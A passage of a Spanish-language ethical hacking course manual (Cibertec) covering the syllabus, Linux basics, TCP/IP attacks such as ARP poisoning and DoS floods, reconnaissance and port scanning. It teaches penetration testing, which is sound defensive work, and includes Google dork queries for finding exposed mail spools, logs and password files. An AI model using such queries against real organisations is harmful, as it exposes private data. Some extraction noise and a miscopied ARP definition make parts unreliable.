Está en la página 1de 104

CIBERTEC

DIRECCIÓN ACADÉMICA DE EXTENSIÓN PROFESIONAL


DIVISIÓN DE ALTA TECNOLOGÍA

Ethical Hacking

40 Horas
Todos los nombres propios de programas,
sistemas operativos, equipos hardware,
etc., que aparecen en este manual son
marcas registradas de sus respectivas
compañías u organizaciones.

Ethical Hacking

DATPr EthicalHacking 40H – 15082014

CIBERTEC PERU SAC

Queda prohibida la reproducción o transmisión total o parcial del contenido de la


presente obra en cualesquiera de sus formas, sean electrónicas o mecánicas, sin
el consentimiento previo y por escrito del editor
Copyright © Todos los Derechos Reservados - Cibertec Perú SAC

Programa : Ethical Hacking


Curso : Ethical Hacking
Duración : 40 horas

SYLLABUS

I. DESCRIPCIÓN

Con el crecimiento exponencial de la Internet y su infraestructura, cada vez son más las
organizaciones que apuestan por Internet como un medio, para brindar servicios a sus
clientes y guardar su información. En estos tiempos, la información es un activo primordial
para la organización y su modelo de negocio.

El Ethical Hacking es el proceso por el cual, se utilizan las mismas técnicas y herramientas
de un atacante malicioso para atacar a una organización de una manera controlada; esta
filosofía resulta de la práctica probada: "para atrapar a un ladrón debes pensar como un
ladrón". El objetivo del Ethical Hacking es brindar ayuda a las organizaciones para que
tomen todas las medidas preventivas en contra de agresiones maliciosas, valiéndose para
ello, de los tests de intrusión, los cuales evalúan la seguridad técnica de los sistemas de
información, redes de datos, aplicaciones web, servidores expuestos, etc.

Pre-requisitos:
 Conocimientos intermedios de redes
 Conocimientos básicos de programación

II. OBJETIVO GENERAL

Al finalizar el curso, el alumno podrá:

 Identificar y describir cómo operan los “hackers” cuando atacan servidores y clientes,
a través de Internet.
 Realizar una prueba de penetración.
 Utilizar en forma práctica, las herramientas que se utilizan en un proceso de Ethical
Hacking.
 Explicar la metodología OSSTMM desarrollada por ISECOM, para realizar tests de
seguridad.
 Describir cómo funcionan los ataques más comunes que ocurren en Internet y por
consiguiente, cómo protegerse de ellos.
 Explicar las ventajas del uso de la tecnología y los peligros que se pueden generar si
no se tiene implementada una cultura de seguridad.

1
III. METODOLOGÍA

La metodología será expositiva y práctica; apoyada con laboratorios que han sido
diseñados para complementar y afianzar el aprendizaje del curso. Los manuales y
diapositivas han sido desarrollados a la medida, y se utilizarán mediante los medios
multimedia, implementados en las aulas. A cada alumno se le asignará una computadora
con el software necesario.

Recursos:
 Una computadora personal
 Syllabus del curso
 Material Educativo del curso

IV. EVALUACIÓN

Se rendirá durante el curso, laboratorios calificados y se implementará un proyecto cuya


especificación técnica será definida por el instructor del curso.
El promedio final será obtenido mediante la siguiente fórmula:

PF = 0.5*Promedio Laboratorios + 0.5*Examen Final

La nota mínima aprobatoria para el curso será 14. (Calificación vigesimal)

2
V. CONTENIDO ANALITICO

CAPÍTULO No. 1: Introducción al Ethical


Duración: 4 hrs.
Hacking
Objetivo: Reconocer y explicar el proceso del Ethical Hacking
Temas

 Conceptos Básicos
 Historia de los Hackers
 Tipos de Ethical Hacking
 Etapas del Ethical Hacking
 Metodologías de Evaluación

Laboratorio No. 1:
 Cuestionario de Preguntas
 Discusión en clase

CAPÍTULO No. 2: Introducción a Linux Duración: 4 hrs.

Objetivo: Desenvolverse en una línea de comandos del sistema operativo.


Temas

 Introducción
 Consola de Linux
 Sistema de Archivos
 Instalación de Software

Laboratorio No. 2:
 Instalación de software utilizando consola
 Compilando código C
 Interpretando scripts perl, python, bash

CAPÍTULO No. 3: Seguridad en Protocolos TCP/IP Duración: 6 hrs.

Objetivo: Entender el funcionamiento de los protocolos y sus deficiencias. Conocer el


funcionamiento del malware
Temas

 Protocolos de la pila TCP/IP


 Sniffing
 Envenenamiento ARP
 Denegación de Servicio
 Malware (Virus, Troyanos, Gusanos, Bombas Lógicas, Botnets, etc)

Laboratorio No. 3:
 Capturando paquetes en la red con Wireshark
 Envenenamiento ARP con Etterpcap y arpspoof

3
CAPÍTULO No. 4: Reconocimiento del Objetivo Duración: 4 hrs.

Objetivo: Conocer el proceso de la etapa de reconocimiento del objetivo.


Temas

 Introducción
 Google Hacking
 Interrogación DNS
 Herramientas

Laboratorio No. 4:
 Buscando información sensible con Google.
 Herramientas host, dig, whois, SamSpade

CAPÍTULO No. 5: Scanning y Enumeración Duración: 7 hrs.

Objetivo: Comprender y realizar un escaneo de puertos.


Temas

 Introducción
 Escaneo de Puertos y Enumeración de Servicios
 Nmap

Laboratorio No. 5:
 Uso de herramientas de scanning.
 RETO: Elevando privilegios en un servidor local.

CAPÍTULO No. 6: Análisis de Vulnerabilidades Duración: 5 hrs.

Objetivo: Comprender y realizar un análisis de Vulnerabilidades


Temas

 Introducción
 Analizadores a Nivel Plataforma
 Analizadores a Nivel Aplicación

Laboratorio No. 6:
 Reconociendo vulnerabilidades a nivel plataforma con Nessus,NeXpose
 Análisis de Vulnerabilidades a nivel aplicación.

CAPÍTULO No. 7: Inseguridad en Aplicaciones Web Duración: 6 hrs.

Objetivo: Explotar vulnerabilidades en sistemas y aplicaciones.


Temas

 Introducción
 Vulnerabiliaddes Web
 Frameworks de Aprendizaje

Laboratorio No. 7:
 Explotando vulnerabilidades Web (RFI, SQLi, LFI)
 Atacame (Reto)

4
CAPÍTULO No. 8: Explotación de Vulnerabilidades Duración: 4 hrs.

Objetivo: Conocer las vulnerabilidades Web y cómo son explotadas.


Temas

 Trabajando con Exploits


 Metasploit Framework
 La Navaja Suiza del Hacker
 Password Cracking

Laboratorio No. 8:
 Explotando vulnerabilidades con Metasploit
 Consiguiendo una shell con Netcat

EVALUACIÓN FINAL Duración: 1 hr.

VI. REFERENCIAS BIBLIOGRAFICAS Y VIRTUALES

Libros:

 Penetration Testing And Network Defense. (2005). Cisco Press. United States of
America
 Penetration Tester's Open Source Toolkit. (2007). Syngress. United States of America
 The Web Application Hackers Handbook (2009). Wiley Publishing. United States of
America
 Hacking Exposed 6th Edition. (2009). McGraw-Hill. United States of America
 Google Hacking For Penetration Testers. (2005). Syngress. United States of America
 Material Técnico de Open-Sec.(2009) Perú

5
oidiiddhufhahfofhjfhajos
División de Alta Tecnología
Ethical Hacking

1.0 Introducción al Ethical Hacking

Contenido de Agenda

 Conceptos básicos
 Historia de los Hackers
 Tipos de Evaluación
 Etapas del Ethical Hacking
 Metodología de Evaluación

1
División de Alta Tecnología
Ethical Hacking

1.1. Origen de los Problemas de Seguridad

Debido a la creciente interconexión entre


los sistemas de información y las redes
digitales, existe un mayor rango de
ataque de personas no autorizadas, las
cuales pueden tener consecuencias
catastróficas para una organización.

1.2. Amenazas, Vulnerabilidades y Riesgos

2
División de Alta Tecnología
Ethical Hacking

1.3. Evolución de Ataques

Manipulación de Gusanos en
Paquetes / Spoofing Internet
Alto Análisis “Ocultos”
DDoS
Sweepers Sofisticación de las
Back Doors
Sniffers herramientas de los
Explotación de O-day exploits
atacantes
vulnerabilidades
conocidas Deshabilitar
Programas auditorías
auto
replicados
Password Cracking
Conocimiento
técnico
Adivinar requerido
Passwords

Bajo 1980 1990 2000+

1.4. Conceptos de Seguridad

Se puede entender como seguridad, al estado que define un activo basándose en 3


principios:

a) Confidencialidad: la información sólo puede acceder a las personas


autorizadas para ello.

b) Integridad: la información ha de estar completa y correcta en todo


momento.

c) Disponibilidad: la información está lista para acceder a ella, por un usuario


válido.

3
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Conceptos básicos
 Historia de los Hackers
 Tipos de Evaluación
 Etapas del Ethical Hacking
 Metodología de Evaluación

2.1. Definición del Hacker

Originalmente, el término hacker no tenía


connotaciones negativas. Un hacker era
concebida como una persona con elevados
conocimientos y gran curiosidad, que
deseaba
aprender tanto como pueda sobre sistemas
informáticos.

4
División de Alta Tecnología
Ethical Hacking

2.2. Los Primeros Hackers

a) PDP-1
b) MIT
c) Tech Model Railroad Club
d) ARPANET

2.3. Surgimiento de UNIX

a) Laboratorios Bell
b) Multics
c) C
d) USENET
e) Free Software Foundation
f) Linus Torvalds

5
División de Alta Tecnología
Ethical Hacking

2.4. Los Hackers Famosos

a) Kevin Mitnick
b) Adrian Lamo
c) Tsutomu Shimomura

2.5. Principales Clasificaciones

a) Hackers
b) Crackers
c) Lamers
d) Newbie
e) Phreakers
f) Cyber-Terrorist

6
División de Alta Tecnología
Ethical Hacking

2.6. Terminología del Hacker

a) Trazabilidad
b) Autenticidad
c) Activo
d) Amenaza
e) Vulnerabilidad
f) Riesgo
g) Ataque

2.6. Terminología del Hacker

El Hackeo Ético es una herramienta defensiva que evalúa las


medidas de seguridad, simulando un intento de intrusión y que es
desarrollado antes de que ocurra un ataque para descubrir
vulnerabilidades.

7
División de Alta Tecnología
Ethical Hacking

2.6 Terminología del Hacker

El Ethical Hacking es el proceso desarrollado en un


ambiente controlado, por el cual se utilizan las mismas
técnicas y herramientas utilizadas por un atacante
malicioso, para vulnerar la seguridad de las redes de una
organización con el propósito de evaluar el estado de su
seguridad.

2.6. Terminología del Hacker

Seguridad de la Información
Protege la información de un amplio espectro de amenazas, a efectos de
asegurar la continuidad y minimizar los daños a la empresa
maximizando el retorno de inversión.

Seguridad Informática
Asegura los recursos del sistema de información (material informático o
programas) de la empresa para ser utilizados de la manera en que se
decidió.

8
División de Alta Tecnología
Ethical Hacking

2.7. Estudios y Certificaciones

Contenido de Agenda

 Conceptos básicos
 Historia de los Hackers
 Tipos de Evaluación
 Etapas del Ethical Hacking
 Metodología de Evaluación

9
División de Alta Tecnología
Ethical Hacking

3.1. Evaluaciones del Ethical Hacking

Se organizan según el conocimiento de los detalles de implementación de


los consultores, sobre el sistema a ser evaluado. Según esta métrica, existen 3
tipos:

WHITEBOX BLACKBOX
GRAYBOX

3.2. Testeo de Seguridad de Internet

10
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Conceptos básicos
 Historia de los Hackers
 Tipos de Evaluación
 Etapas del Ethical Hacking
 Metodología de Evaluación

4.1. Procesos del Ethical Hacking

a) Reconocimiento
b) Scanning
c) Conseguir Acceso
d) Mantener Acceso
e) Borrar Huellas

11
División de Alta Tecnología
Ethical Hacking

4.1. Procesos del Ethical Hacking

2
1

4
5
3

Contenido de Agenda

 Conceptos básicos
 Historia de los Hackers
 Tipos de Evaluación
 Etapas del Ethical Hacking
 Metodología de Evaluación

12
División de Alta Tecnología
Ethical Hacking

5.1. Procedimiento de Evaluación

5.2. Puntos de Evaluación

a) Seguridad de la Información
b) Seguridad de los Procesos
c) Seguridad en las Tecnologías de Internet
d) Seguridad en las Comunicaciones
e) Seguridad Inalámbrica
f) Seguridad Física

13
División de Alta Tecnología
Ethical Hacking

Laboratorio nº 1

Ejercicio 1:
 Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones
 Tiempo Estimado: 15 minutos

14
División de Alta Tecnología
Ethical Hacking

2.0 Introducción al Ethical Hacking Sistema Operativo Linux

Contenido de Agenda

 Introducción
 Consola de Linux
 Sistema de Archivos
 Instalación del Software

1
División de Alta Tecnología
Ethical Hacking

1.1. ¿Qué es un Sistema Operativo?

Es un software que implementa una colección de rutinas que actúa como


interfaz entre el hardware y los aplicativos utilizados por el usuario. Es
responsable de gestionar y coordinar el acceso al hardware para los
distintos aplicativos que se ejecutan.

1.2. ¿Qué es un Sistema Informático?

Es el conjunto de partes interrelacionadas, hardware, software y de recurso


humano. Un sistema informático típico emplea una computadora que usa
dispositivos programables para capturar, almacenar y procesar datos.

USUARIO 1 USUARIO 2 USUARIO 3 USUARIO N

PROGRAMAS DE APLICACIÓN
SISTEMA OPERATIVO
HARDWARE

2
División de Alta Tecnología
Ethical Hacking

1.3. GNU/Linux /Libertades Software Libre

GNU Linux
a) Poderoso y versátil S.O. de licencia libre
b) Núcleo (Linus Torvalds) combinado con sistema GNU
c) Desarrollo de la comunidad

Libertades Software Libre


a) Usar con cualquier propósito
b) Modificar y adaptarlo a necesidades
c) Distribuir copias
d) Licencia Pública General GNU

1.4. Distribuciones

a) Ubuntu
b) RedHat
c) Fedora
d) Debian
e) Suse Enterprise
f) OpenSuse
g) Gentoo

3
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Introducción
 Consola de Linux
 Sistema de Archivos
 Instalación del Software

2.1. Antecedentes

a) En Linux es frecuente la interacción con la consola o línea de comandos.


b) En modo gráfico se presentan opciones dadas por el diseñador, mientras
que en modo consola se tiene las funcionalidades creadas por el
programador.
c) La línea de comandos permite ejecutar utilidades con mayor rapidez en
comparación con la interfaz gráfica y consumen menos recursos, ya que no
es necesario cargar librerías gráficas.

4
División de Alta Tecnología
Ethical Hacking

2.1. Antecedentes

d) La mayoría de las herramientas liberadas utilizadas para Ethical Hacking


están diseñadas para consola.
e) Es importante que una persona que desea realizar un proceso de Ethical
Hacking pueda desenvolverse cómodamente en la línea de comandos del
sistema operativo Linux.

2.2. Comandos Básicos

Los principales comandos GNU/Linux para consola son:

a) LS: lista ficheros de un directorio


b) PWD: visualiza el directorio actual
c) CD: cambia de directorio
d) MV: mover o renombrar ficheros
e) CP: copia ficheros
f) CAT: muestra en pantalla contenido del archivo
g) HED: muestra 10 primeras líneas del archivo
h) TAIL: muestra 10 últimas líneas del archivo

5
División de Alta Tecnología
Ethical Hacking

2.3. Gestión de Usuarios

El GNU/Linux es multiusuario por lo que es necesaria la gestión de los


usuarios que harán uso del sistema. En un GNU/Linux hay usuarios normales,
sistema y ROOT. Los principales comandos son:

a) Useradd
b) Userdel
c) Passwd
d) Groups
e) Groupadd

2.4. Configuración de Red

Para que un computador tenga conectividad y acceso a Internet se necesitará 3


cosas:
a) Dirección IP privada con su respectiva máscara de red
b) Puerta de enlace por donde se enviarán los paquetes
c) Servidores DNS para resolver dominios a conectarse

Ejemplo:
a) IFCONFIG eth0 192.168.1.30 netmask 255.255.255.0
b) ROUTE ADD DEFAULT gw 192.168.1.1
c) VI /ETC/RESOLV.CONF
d) NAMESERVER 8.8.8.8

6
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Introducción
 Consola de Linux
 Sistema de Archivos
 Instalación del Software

3.1. Antecedentes y Comandos

En el momento de la instalación, Linux crea una estructura de directorios


básica, definida por Filesystem Hierarchy Standard Group, llamada Filesystem
Hierarchy Standard

7
División de Alta Tecnología
Ethical Hacking

3.1. Antecedentes y Comandos

3.2. Permisos del Sistema de Archivos

El sistema de permisos de GNU/Linux tiene un esquema de usuarios y grupos,


el cual se convierte en la base para la seguridad. A los usuarios y grupos se les
delega permisos sobre los archivos y directorios.
Los tipos de usuarios en Linux son:

a) Owner: usuario dueño de la carpeta o el archivo


b) Group: grupo de usuarios con permisos similares
c) Other: cualquier otro usuario

Los tipos de permiso son R(read), W(write) y X(execute)

8
División de Alta Tecnología
Ethical Hacking

3.2. Permisos del Sistema de Archivos

3.3. Listado de Comandos

9
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Introducción
 Consola de Linux
 Sistema de Archivos
 Instalación del Software

4.1. Introducción

a) En todo sistema se hace necesaria la instalación de nuevo software que


añada nueva funcionalidad a la ya existente. Para GNU/Linux,
dependiendo de la distribución, el software puede ser instalado de
varias maneras.
b) Es posible instalar software desde los repositorios propios de la
distribución, a través de paquetes y compilando el código fuente.
c) Existen 2 aplicaciones que sirven para instalar el software, a través de
línea de comandos y desde los repositorios: APT-GET y APTITUDE.

10
División de Alta Tecnología
Ethical Hacking

4.2. Comando de Instalación

a) APTITUDE install nombre paquete

b) APTITUDE install firefox

c) APTITUDE search firefox

d) APTITUDE remove firefox

e) APTITUDE show firefox

4.2. Comando de Instalación

a) TAR xvzf fuente.tar.gz

b) CD fuente

c) ./CONFIGURE

d) MAKE

e) MAKE install (opcional)

11
División de Alta Tecnología
Ethical Hacking

4.3. Proceso de Instalación

Laboratorio nº 2

 Ejercicio:
 Tiempo: 30 minutos
 Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá, obtener valiosas conclusiones

12
División de Alta Tecnología
Ethical Hacking

3.0 Seguridad en Protocolos TCP/IP

Contenido de Agenda

 Protocolos de la pila TCP/IP


 Sniffing
 Envenenamiento ARP
 Denegación de Servicio
 Malware

1
División de Alta Tecnología
Ethical Hacking

1.1. Introducción a Protocolos de Comunicación

1.2. ¿Qué es un Protocolo?

Un protocolo puede ser visto como un lenguaje que utilizan las computadoras
para comunicarse e intercambiar información entre sí. Los protocolos
permiten que equipos con diferentes arquitecturas o sistemas operativos se
enlacen.

2
División de Alta Tecnología
Ethical Hacking

1.3. El Modelo OSI

1.4. El Modelo TCP/IP

3
División de Alta Tecnología
Ethical Hacking

1.4. El Modelo TCP/IP

1.4. El Modelo TCP/IP

a) Es un protocolo de red que implementa el mecanismo de entrega de


paquetes de datos.
b) No provee ningún mecanismo para determinar si un paquete alcanza su
destino o no, por eso se dice que no es orientado a conexión

4
División de Alta Tecnología
Ethical Hacking

1.5. Protocolo TCP (Transmission Control Protocol)

a) TCP es un protocolo que tiene un diseño orientado a la conexión y brinda


fiabilidad a la entrega de paquetes.
b) Las aplicaciones necesitan una comunicación fiable y el IP no lo da, TCP
añade funciones necesarias para una comunicación libre de errores y sin
pérdidas.

Contenido de Agenda

 Protocolos de la pila TCP/IP


 Sniffing
 Envenenamiento ARP
 Denegación de Servicio
 Malware

5
División de Alta Tecnología
Ethical Hacking

2.1. Definición

El sniffing (olfatear) es una técnica que consiste en


monitorear el tráfico de una red local, mediante cambios en
la configuración de la tarjeta de red.

2.2. Wireshark

a) Es un analizador de paquetes de software libre utilizado para visualizar


el tráfico que fluye en la red.
b) Identifica y soluciona los problemas de conectividad en una red, pero
también puede ser utilizado de forma maliciosa para conseguir
información confidencial.

6
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Protocolos de la pila TCP/IP


 Sniffing
 Envenenamiento ARP
 Denegación de Servicio
 Malware

3.1. Definición y Conceptos

a) Un switch es un equipo de
conectividad que trabaja en la capa
de enlace similar a un concentrador.

b) Un switch es capaz de analizar una


trama antes de enviarla por alguno
de sus puertos.

7
División de Alta Tecnología
Ethical Hacking

3.1. Definición y Conceptos

c) Los switches trabajan mandando el tráfico sólo al segmento de red


donde se encuentra el host destino.
d) Esto debido a que los poseen las denominadas tablas CAM (memoria de
contenido direccionable), donde se almacena la información de las
direcciones MAC

3.2. Protocolo ARP

a) Es un analizador de paquetes de software libre utilizado para visualizar el


tráfico que fluye por una red.
b) Se envía un paquete (ARP REQUEST) al broadcast y se espera que el
equipo responda (ARP REPLY) con la dirección MAC.

8
División de Alta Tecnología
Ethical Hacking

3.3. Causas del Envenenamiento ARP

a) Ausencia de autenticación en el protocolo.


b) La tabla ARP está sujeta a alteraciones externas.
c) Puede enviarse mensajes ARP falsos.

3.4. Herramientas ARP

a) ARPSPOOF es una herramienta gratuita en modo consola que es


parte de la suite de tools llamando DSNIFF que permite implementar
ataques Man In The Middle enviando paquetes ARP falsos que
engañan a otros equipos dentro de una red local.
b) ETTERCAP es una herramienta de software libre, inicialmente fue
desarrollada tan sólo como un analizador de paquetes pero que con
el proceso de desarrollo logró convertirse en una herramienta para
realizar ataques Man in the Middle.

9
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Protocolos de la pila TCP/IP


 Sniffing
 Envenenamiento ARP
 Denegación de Servicio
 Malware

4.1. Introducción

Un ataque de denegación de
servicio, también llamado DoS
(Denial of Service) es un ataque a
un sistema de computadoras o red,
que causa que un servicio o recurso
sea inaccesible a los usuarios
legítimos.

10
División de Alta Tecnología
Ethical Hacking

4.2. Denegación del Servicio

a) Consumo de los recursos computacionales: ancho de banda, espacio en


disco, tiempo de procesador .
b) Alteración de información de configuración: información de rutas de
encaminamiento .
c) Alteración de la información del estado: interrupción de sesiones TCP (TCP
reset).
d) Interrupción de componentes físicos de red.
e) Obstrucción de medios de comunicación entre usuarios de un servicio y la
víctima.

4.3. Tipos de Ataque (Denegación de Servicio)

a) DoS: este tipo de ataque se


caracterizan por tener un único
origen desde el cual se realiza el
ataque.
b) Ddos: este tipo de ataque utiliza
varias fuentes para realizar un
ataque progresivo, rotatorio o
total en forma coordinada.
Normalmente, se asocia a una
campaña Botnet que infecta miles
de equipos con un malware.

11
División de Alta Tecnología
Ethical Hacking

4.4. Los Ataques más Populares

Syn Flood

El cliente envía un paquete SYN, pero no responde al paquete ACK


ocasionando que el servidor permanezca a la escucha, un determinado
tiempo hasta cancelar la llamada.

4.4. Los Ataques más Populares

ICMP Flood

Consiste en el envío de forma continua de un número elevado de


paquetes ICMP (Echo Request) de tamaño considerable hacia la víctima
de forma que ésta ha de responder con paquetes ICMP (Echo Reply), lo
que supone una sobrecarga, tanto en la red como en el sistema de la
víctima.

12
División de Alta Tecnología
Ethical Hacking

4.4. Los Ataques más Populares

SMURF

Es una variante de ICMP Flood, por la cual el atacante envía grandes


cantidades de tráfico ICMP (ping) a la dirección de broadcast de una
red, cambiando la dirección de origen (spoofing) por la dirección de la
víctima. Los equipos de la red recibirán los mensajes ICMP (echo request)
y lo responderán, multiplicando el tráfico por cada host de la subred.

4.4. Los Ataques más Populares

TEARDROP

El ataque Teardop se basa en introducir información de compensación


falsa en los paquetes fragmentados. En consecuencia, durante el
reensamblado, quedan fragmentos vacíos o superpuestos que pueden
desestabilizar el sistema.

13
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Protocolos de la pila TCP/IP


 Sniffing
 Envenenamiento ARP
 Denegación de Servicio
 Malware

5.1. Definición

Es un tipo de software que tiene como objetivo


infiltrarse o dañar una computadora sin el
consentimiento de su propietario.
El término malware incluye virus, gusanos,
troyanos, rootkits, spyware, entre otros.

14
División de Alta Tecnología
Ethical Hacking

5.2. Tipos de Malware

a) Troyano
b) Virus
c) Bomba Lógica
d) Botnet
e) Gusano
f) Keylogger
g) Stealer
h) Rootkit
i) Adware
j) Spyware
k) Backdoor

5.3. Medios de Infección

a) Portales Web Falsas


b) Páginas Web que explotan vulnerabilidades
c) Redes P2P
d) Vulnerabilidades
e) Correos Electrónicos
f) Medios de Almacenamiento

15
División de Alta Tecnología
Ethical Hacking

Laboratorio nº 3

 Ejercicio:
 Tiempo: 60 minutos
 Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá, obtener valiosas conclusiones

16
División de Alta Tecnología
Ethical Hacking

4.0 Reconocimiento del Objetivo

Contenido de Agenda

 Introducción
 Google Hacking
 Interrogación DNS
 Herramientas

1
División de Alta Tecnología
Ethical Hacking

1.1. Antecedentes

1.1. Antecedentes

a) En inicio de un proceso de Ethical Hacking es el acercamiento para


conseguir información de la organización de manera pasiva.
b) Su objetivo principal es mapear la organización objetivo del mundo
real a un mundo virtual o cibernético.
c) Se define mundo cibernético, como un conjunto de direcciones IP
relevantes y alcanzables.

2
División de Alta Tecnología
Ethical Hacking

1.2. Principales Objetivos

a) Nombres de dominio
b) Direcciones IP
c) Información de registro (IP, Dominio)
d) Rangos de red
e) Proveedor de Internet
f) Tecnologías utilizadas
g) Arquitectura de Red
h) Información relevante

Contenido de Agenda

 Introducción
 Google Hacking
 Interrogación DNS
 Herramientas

3
División de Alta Tecnología
Ethical Hacking

2.1. Definición y Conceptos

a) Los motores de búsqueda permiten encontrar cualquier cosa en Internet


(Page Rank, Deepbot, Freshbot)
b) Los operadores de búsqueda de Google son términos de consulta que
realizan acciones especiales que permiten localizar de forma rápida y
precisa la información.
c) Los operadores de búsqueda más utilizados para la técnica Google
Hacking son:
• Site: limita los resultados de la búsqueda al dominio.
• Inurl: restringe resultado de búsqueda a las URL's.
• Filetype: restringe el resultado a documentos.
• Intitle: palabras en el título de páginas HTML
• Intext: palabras en el contenido de páginas HTML

2.1. Definición y Conceptos

d) Google Hacking es una técnica que utiliza a Google y su potencial para


encontrar información privada de la organización.
e) Con esta técnica se consigue el perfil de una empresa en forma pasiva sin
utilizar técnicas intrusivas sobre los servidores.

4
División de Alta Tecnología
Ethical Hacking

2.2. Operadores de Búsqueda

a) Lectura de mails confidenciales


filetype:mbx intext:Subject
intitle:index.of inbox

b) Logs de aplicaciones
ws_ftp filetype:log access
filetype:log

c) Ficheros con passwords


filetype:bak createobject sa
filetype:inc mysql_connect()

Contenido de Agenda

 Introducción
 Google Hacking
 Interrogación DNS
 Herramientas

5
División de Alta Tecnología
Ethical Hacking

3.1. Protocolo DNS

a) El protocolo DNS (Domain Name System) puede ser considerado como la


espina dorsal de Internet.
b) Es como una base de datos distribuida y jerárquica, que almacena toda
la información asociada a nombres del dominio.
c) Transferencia de Zona.

3.2. Tipos de Registros DNS

6
División de Alta Tecnología
Ethical Hacking

3.3. Software de Apoyo

Consola
a) Whois
b) Dig.
c) Host

Web
a) RIR
b) Netcraft (www.netcraft.com)
c) Clez (www.clez.net)

Contenido de Agenda

 Introducción
 Google Hacking
 Interrogación DNS
 Herramientas

7
División de Alta Tecnología
Ethical Hacking

4.1. Introducción

El objetivo de la etapa de Reconocimiento


es encontrar toda la información posible
sobre la organización, antes de continuar
con la siguiente etapa.

4.2. Software de Reconocimiento

a) Wayback Machine (www.archive.org)


b) Fierce
c) Dnsmap
d) Metagoofil
e) TheHarverster

8
División de Alta Tecnología
Ethical Hacking

Laboratorio nº 4

 Ejercicio:
 Tiempo: 60 minutos
 Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.

9
oidiiddhufhahfofhjfhajos
División de Alta Tecnología
Ethical Hacking

5.0 Scanning y Enumeración

Contenido de Agenda

 Introducción
 Escaneo y Enumeración
 Nmap

1
División de Alta Tecnología
Ethical Hacking

1.1. Antecedentes

a) Una vez terminado el reconocimiento se tiene una lista de objetivos


pertenecientes a la organización además de información relevante sobre
el objetivo.
b) El objetivo es descubrir puertos abiertos y servicios que se encuentran
funcionando en dichos puertos.
c) El atacante empieza a obtener más información sobre el objetivo
realizando las siguientes acciones:
– Reconocer equipos activos en el rango objetivo.
– Descubrir servicios ejecutándose en los objetivos.
– Identificar el sistema operativo.
– Enumerar los servicios.

Contenido de Agenda

 Introducción
 Escaneo y Enumeración
 Nmap

2
División de Alta Tecnología
Ethical Hacking

2.1. Conceptos Básicos

Dirección IP

Es una dirección lógica de 32 bits que identifica de forma unívoca a un


equipo dentro de una red. Cuando uno se encuentra en una red local, ésta
tendrá dos pares de direcciones. Una dirección IP privada y otra pública.

2.1. Conceptos Básicos

Puerto

Es un número de 16 bits que puede estar entre 0 y 65535. Permite


establecer conexiones diferenciadas entre máquinas. Un puerto tiene 3
estados: abierto, cerrado y bloqueado.

3
División de Alta Tecnología
Ethical Hacking

2.1. Conceptos Básicos

Socket

Es un concepto abstracto por el cual 2 aplicaciones situadas en


computadores distintas (o en la misma) pueden intercambiar un flujo de
datos. De manera más técnica, un socket es definido por una dirección IP,
un protocolo de transporte y un número de puerto.

2.1. Conceptos Básicos

Socket

Toda conexión en Internet está identificada por un socket, es decir, una


máquina de origen (con su respectiva dirección IP) con su puerto, y una
máquina de destino con su puerto.

4
División de Alta Tecnología
Ethical Hacking

2.1. Conceptos Básicos

Conexión TCP

El establecimiento de conexiones en TCP tiene un proceso prefijado y tiene


por finalidad, sincronizar los 2 host que participarán en la futura conexión. El
llamado three way handshake o saludo en tres vías.

2.2. Tipos de Escaneos

Ping Sweep

Consiste enviar un ECHO REQUEST a los equipos especificados en espera


de respuestas ECHO REPLY, para determinar qué equipos dentro de una
red se encuentran activos.

5
División de Alta Tecnología
Ethical Hacking

2.2. Tipos de Escaneos

TCP Connect

La técnica consiste en realizar un saludo de 3 vías a cada uno de los


puertos del host escaneado. Este escaneo es el más preciso; sin embargo,
su principal desventaja es el “ruido” que ocasiona lo hace más fácil de
detectar por los firewalls.

2.2. Tipos de Escaneos

SYN Scan

Conocida como Half Open. Se envía un paquete SYN y espera respuesta.


Si un SYN/ACK retorna se toma como abierto, si RST retorna se toma como
cerrado y si no hay respuesta, se toma como filtrado.

6
División de Alta Tecnología
Ethical Hacking

2.2. Tipos de Escaneos

SYN Scan

La diferencia con TCP Connect, es que de estar abierto y recibir un


SYN/ACK, el equipo que escanea no responde con paquete ACK, sino que
envía un RST para terminar la conexión y evitar que el sistema lo registre
como un intento de conexión.

2.2. Tipos de Escaneos

NULL Scan

Este escaneo se basa en enviar un paquete malformado con todos los flags
TCP desactivados y esperar la respuesta. Según el RFC 793, si un sistema
recibe un paquete hacia un puerto cerrado TCP, sin ningún flag activo,
deberá responder con un RST.

7
División de Alta Tecnología
Ethical Hacking

2.2. Tipos de Escaneos

XMAS Scan

Este escaneo se basa en enviar un paquete TCP al sistema escaneado con


3 flags activos: URG, PSH y FIN. Los resultados son iguales a los de un Null
Scan: si la respuesta es RST, el puerto se encuentra cerrado y si no hay
respuesta, el puerto se encuentra o abierto o filtrado.

2.2. Tipos de Escaneos

FIN Scan

El escaneo FIN consiste en enviar un paquete TCP al puerto escaneado con


el flag FIN activo. Es conocido como el stealth scan (escaneo silencioso)
dado que es el escaneo más discreto que existe. El puerto se determinará
abierto o cerrado según la respuesta al igual que los 2 escaneos anteriores.

8
División de Alta Tecnología
Ethical Hacking

2.2. Tipos de Escaneos

UPD Scan

Las técnicas anteriores se basan en el escaneo de servicios que utilicen el


protocolo TCP. El escaneo consiste en enviar un paquete UDP vacío al puerto
objetivo. El sistema responderá con un paquete ICMP tipo 3, si el puerto está
cerrado, en caso de no responder el puerto puede estar o abierto o filtrado.

2.3. Enumeración de los Servicios

La etapa de enumeración de servicios consta de reconocer el programa


demonio (daemon) que gestiona el servicio trabajando en el puerto
específico, una vez reconocido un puerto como abierto.

9
División de Alta Tecnología
Ethical Hacking

2.3. Enumeración de los Servicios

Banner Grabbing se le denomina a la técnica que consiste en establecer


una conexión hacia un servicio y visualizar la información que el
demonio brinda sobre sí mismo (el banner).

2.3. Enumeración de los Servicios

10
División de Alta Tecnología
Ethical Hacking

